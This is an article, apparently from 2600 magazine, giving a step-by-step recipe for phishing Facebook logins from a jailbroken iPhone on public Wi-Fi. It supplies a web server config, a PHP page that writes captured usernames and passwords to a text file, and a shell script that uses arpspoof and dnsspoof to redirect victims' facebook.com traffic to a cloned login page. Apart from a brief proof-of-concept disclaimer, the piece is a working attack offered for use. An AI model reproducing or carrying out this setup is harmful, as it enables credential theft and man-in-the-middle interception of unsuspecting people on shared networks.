Phishing on an iDevice

by Jared DeWitt

This article was written with the intent that none of this be used for malicious acts.  This is only a proof-of-concept and should never be used for any personal gain.

In this article, I will be going over how to turn your iDevice into a phishing device, allowing you to act as a trusted site, faking the user into giving up personal information.  In this example, we'll be gaining facebook.com account information.

The idea is simple.

You'll connect to a public wireless network from your iDevice, spoof the gateway's DNS entry for facebook.com, and then host your own version of facebook.com.  Your own version will prompt the user for username/password, then log it to a file, and redirect to an error page.

I got this idea while watching a podcast from Hak5.

Darren used a device called a Wi-Fi Pineapple.  I, being cheap, decided to try something similar with my iPhone instead of purchasing another piece of gear.  (Thanks, Darren!)

lighttpd.conf:

include "mod_fastcgi.conf"
server.document-root = "/htdocs"
server.port = 80

server.tag ="lighttpd"
server.errorlog            = "/htdocs/log/error.log"
accesslog.filename         = "/htdocs/log/access.log"

mimetype.use-xattr        = "disable"

##
## mimetype mapping
##
mimetype.assign             = (
  ".jpg"          =>      "image/jpeg",
  ".jpeg"         =>      "image/jpeg",
  ".png"          =>      "image/png",
  ".css"          =>      "text/css",
  ".html"         =>      "text/html",
  ".htm"          =>      "text/html",
  ".js"           =>      "text/javascript",

# make the default mime type application/octet-stream.
  ""              =>      "application/octet-stream",
)

#Lines added below to enable PHP

server.modules              = (

        "mod_access",
        "mod_accesslog",
        "mod_fastcgi",
        "mod_rewrite",
        "mod_auth",
        "mod_fastcgi"
)

index-file.names = ( "index.html")

You should now be able to start your lighttpd server:

# lighttpd -f /etc/lighttpd/lighttpd.conf

The next step is to create a fake Facebook page.

I recommend heading over to the facebook.com main page and "Save Page As" and save it somewhere as "web complete".  You'll want to upload those to your iDevice's /htdocs folder via SCP.

Rename facebook.html to index.html.

Edit index.html to save the username field as name and the password to pass.

Also, edit the submit button to launch error.php.

Create an error.php file in /htdocs.  You can use this one (borrowed from Darren over at Hak5):

error.php:

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

        $filed = @fopen("bitches.txt", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
}
?>

<html><body>
<h1>503: Service Temporarily Unavailable</h1>
</body></html>

Also, create a text file for error.php to dump the creds into.  In this case, it will be bitches.txt (thanks again, Darren).

Now, whenever someone hits your index.html, they'll be presented with a page that looks very similar to Facebook.  When they sign into your fake site, it will snag the name and password entries and stick them in bitches.txt and redirect to a 503 page.

Our phishing page is now built!

We just have to make sure people get redirected to it when trying to actually hit facebook.com.  For this task, we'll be using dSniff.  Oh, how we love you, dSniff.  I found a good copy in Cydia from theWorm repo (theworm.altervista.org/cydia).  dSniff is used to spoof the DNS entry for facebook.com to our device.  There are other ways to "man-in-the-middle," but it's simplest to use dnsspoof.

You'll now want a terminal on your device so you don't have to pull up a computer to initiate the attack.  There are plenty out there to download.  Find one you like in Cydia.  I personally use MobileTerminal.

This next one is optional, but handy.  Go get insomnia in Cydia.  It keeps your Wi-Fi active while it's locked.

I created a simple shell script to allow you to initiate everything all with one command instead of multiple.

Save the following as pwn.sh in /var/root.  (I snagged most of this from trcx over at ihackmyi.com):

pwn.sh:

#!/bin/sh
iDeviceIP=`ifconfig en0 | grep "inet " | awk '/inet/ { print $2 }'`
routerIP=`netstat -r | grep default | grep en0 | grep -oE '([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}'`
fURL=*.facebook.com
clear
echo $iDeviceIP
echo $routerIP
echo $fURL
sleep 2

clear

echo "[+] Writing etc/dnsspoof.conf"
echo "$iDeviceIP""        ""$fURL" > /etc/dnsspoof.conf

sleep 2

echo "[>>>] Launching Attack!"

echo "[>>>] Starting httpd server"
lighttpd -f /etc/lighttpd/lighttpd.conf
sleep 2
arpspoof $routerIP | dnsspoof -f /etc/dnsspoof.conf

Initiate the attack (about time!)

Connect to a public Wi-Fi network from your device.

Open up a terminal and become root.

Launch your pwn.sh.

Have a cup of coffee and: tail -f /htdocs/bitches.txt

Thanks for sticking with me on this one!

Code: lighttpd.conf

Code: error.php

Code: pwn.sh
Return to $2600 Index